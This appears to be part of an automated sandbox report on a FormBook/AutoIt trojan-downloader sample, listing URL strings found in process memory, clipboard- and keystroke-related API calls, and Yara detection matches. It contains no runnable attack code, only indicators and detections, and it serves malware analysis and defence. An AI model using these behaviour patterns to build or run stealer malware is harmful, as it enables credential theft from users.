            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/plugins/woocommerce-conversion-tracking/)
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wpzipped.com/
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: makecab.exe, 00000006.00000002.4101618826.000000000588E000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.00000000033DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/#website
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/?s=
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/cart/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/comments/feed/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/conditions-of-use/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/feed/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/my-account/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/my-account/lost-password/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/privacy-policy/
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/product-category/armen-living/
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/product-category/esf/
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/product-category/permatex/
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/product-category/pferd/
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/product-category/surya/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/refund_returns/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/shipping-info/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-admin/admin-ajax.php?action=rest-nonce
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-checkout.js?
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-components.j
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-data.js?v
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-middlewar
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-registry.
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=1
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-settings.js?ver=
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution-blo
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ve
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/them
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/fl-icons.css?ver=3.12
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=6.4.3
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=6.4.3
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/ie-fallback.css
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=6.4.3
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/libs/ie-flexibility.js
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/themes/flatsome/style.css?ver=6.4.3
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-content/uploads/2024/06/cropped-pngtree-ship-logo-cruise-or-ship-log
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/a11y.min.js?ver=7032343a947cfccf5608
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/api-fetch.min.js?ver=0fa4dabf8bf2c7adf21a
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/compose.min.js?ver=3189b344ff39fef940b7
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/data-controls.min.js?ver=fe4ccc8a1782ea8e2cb1
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/data.min.js?ver=dc5f255634f3da29c8d5
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/deprecated.min.js?ver=73ad3591e7bc95f4777a
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3ca
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/dom.min.js?ver=49ff2869626fbeaacc23
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/element.min.js?ver=ed1c7604880e8b574b40
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/escape-html.min.js?ver=03e27a7b6ae14f7afaa6
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/html-entities.min.js?ver=36a4a255da7dd2e1bf8e
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/is-shallow-equal.min.js?ver=20c2b06ecf04afb14fee
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/keycodes.min.js?ver=3460bd0fac9859d6886c
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/notices.min.js?ver=38e88f4b627cf873edd0
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/primitives.min.js?ver=6984e6eb5d6157c4fe44
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/priority-queue.min.js?ver=422e19e9d48b269c5219
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/private-apis.min.js?ver=11cb2ebaa70a9f1f0ab5
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/redux-routine.min.js?ver=0be1b2a6a79703e28531
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/url.min.js?ver=b4979979018b684be209
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/lodash.min.js?ver=4.17.19
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react-dom.min.js?ver=18.2.0
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react.min.js?ver=18.2.0
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/dist/warning.min.js?ver=122829a085511691f14d
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/wp-json/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/xmlrpc.php
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/xmlrpc.php?rsd
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008F425A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008F4458
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008F425A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_008E0219
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_0090CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0090CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
